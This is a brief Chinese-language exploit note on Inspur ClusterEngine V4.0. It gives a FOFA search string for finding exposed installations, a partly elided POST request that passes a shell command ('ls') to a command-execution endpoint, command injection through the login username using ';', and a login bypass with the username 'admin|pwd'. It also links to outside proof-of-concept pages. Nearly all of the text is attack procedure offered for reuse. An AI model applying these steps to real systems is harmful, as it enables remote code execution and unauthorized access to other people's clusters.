1、浪潮ClusterEngineV4.0 任意命令執行
影響版本 ClusterEngineV4.0
2、漏洞影響
遠程代碼執行
3、復現
fofa語句 title='TSCEV4.0'
抓包構造exp
POST /sysShel
......
op=doPlease&node=cu01&command=ls
4、username遠程代碼執行
登錄抓包,閉合username參數
使用;進行命令分割
5、任意用戶登錄
用戶名輸入admin|pwd,密碼任意
成功登錄
6、參考鏈接
https://github.com/NS-Sp4ce/Inspur/tree/master/ClusterEngineV4.0%20Vul
https://blog.csdn.net/DUANYU23/article/details/115499280